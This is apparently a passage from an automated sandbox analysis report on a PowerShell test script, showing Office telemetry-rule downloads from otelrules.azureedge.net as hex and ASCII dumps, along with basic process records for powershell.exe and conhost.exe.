                                                                                                      2024-10-08 18:51:43 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e 65 4e 6f 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      141192.168.2.74985413.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:44 UTC192OUTGET /rules/rule703451v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:44 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:44 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1409
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                      ETag: "0x8DC582BDFC438CF"
                                                                                                      x-ms-request-id: 7cb43a82-e01e-0033-45fe-164695000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185144Z-1657d5bbd48xdq5dkwwugdpzr000000005n000000000vs3w
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:44 UTC1409INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      142192.168.2.74985713.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:44 UTC192OUTGET /rules/rule700900v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:44 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:44 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1371
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:06 GMT
                                                                                                      ETag: "0x8DC582BED3D048D"
                                                                                                      x-ms-request-id: d51e0a59-d01e-005a-6cfe-167fd9000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185144Z-1657d5bbd48wd55zet5pcra0cg000000058g00000000wh9g
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:44 UTC1371INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6f 66 69 6e 67 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700900" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProofing" S="Medium" /> <F


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      143192.168.2.74985613.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:44 UTC192OUTGET /rules/rule700901v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:44 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:44 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1408
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                      ETag: "0x8DC582BE1038EF2"
                                                                                                      x-ms-request-id: 26eb60f2-001e-0014-3066-175151000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185144Z-1657d5bbd48sqtlf1huhzuwq700000000500000000011qkc
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:44 UTC1408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      144192.168.2.74985513.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:44 UTC192OUTGET /rules/rule703450v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:44 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:44 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1372
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                      ETag: "0x8DC582BE6669CA7"
                                                                                                      x-ms-request-id: 9139889b-001e-0079-22f3-1612e8000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185144Z-1657d5bbd482lxwq1dp2t1zwkc000000055000000000cud8
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:44 UTC1372INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      145192.168.2.74985813.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:44 UTC192OUTGET /rules/rule702251v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:44 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:44 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1389
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                      ETag: "0x8DC582BE0F427E7"
                                                                                                      x-ms-request-id: de435f0b-f01e-0052-0101-179224000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185144Z-1657d5bbd48jwrqbupe3ktsx9w00000005f0000000012qw1
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:44 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      146192.168.2.74985913.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:44 UTC192OUTGET /rules/rule702250v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:45 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:44 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1352
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                      ETag: "0x8DC582BDD0A87E5"
                                                                                                      x-ms-request-id: a1812648-601e-0002-69fe-16a786000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185144Z-1657d5bbd482lxwq1dp2t1zwkc000000057g000000000n72
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:45 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="Medium" /> <F T="2"> <O T


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      147192.168.2.74986013.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:44 UTC192OUTGET /rules/rule702651v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:45 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:45 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1395
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                      ETag: "0x8DC582BDEC600CC"
                                                                                                      x-ms-request-id: 72218525-801e-002a-7701-1731dc000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185145Z-1657d5bbd482krtfgrg72dfbtn000000056g000000004k2d
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:45 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 36 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 65 64 69 61 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 65 64 69
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702651" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Media.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMedi


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      148192.168.2.74986113.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:45 UTC192OUTGET /rules/rule702650v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:45 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:45 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1358
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                      ETag: "0x8DC582BDEA1B544"
                                                                                                      x-ms-request-id: b87c1558-301e-0020-2414-176299000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185145Z-1657d5bbd48wd55zet5pcra0cg00000005dg000000005rzn
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:45 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 36 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 65 64 69 61 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 65 64 69 61 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702650" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Media" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMedia" S="Medium" /> <F T="2">


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      149192.168.2.74986213.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:45 UTC192OUTGET /rules/rule703101v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:45 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:45 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1393
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                      ETag: "0x8DC582BE0F93037"
                                                                                                      x-ms-request-id: 8be95a60-a01e-0070-5ff2-16573b000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185145Z-1657d5bbd48wd55zet5pcra0cg000000057g000000010fth
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:45 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 31 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 41 54 53 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 41 54 53 22
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703101" V="1" DC="SM" EN="Office.Telemetry.Event.Office.MATS.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMATS"


                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Target ID:1
                                                                                                      Start time:14:51:16
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\test.ps1"
                                                                                                      Imagebase:0x7ff741d30000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:2
                                                                                                      Start time:14:51:17
                                                                                                      Start date:08/10/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff75da10000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
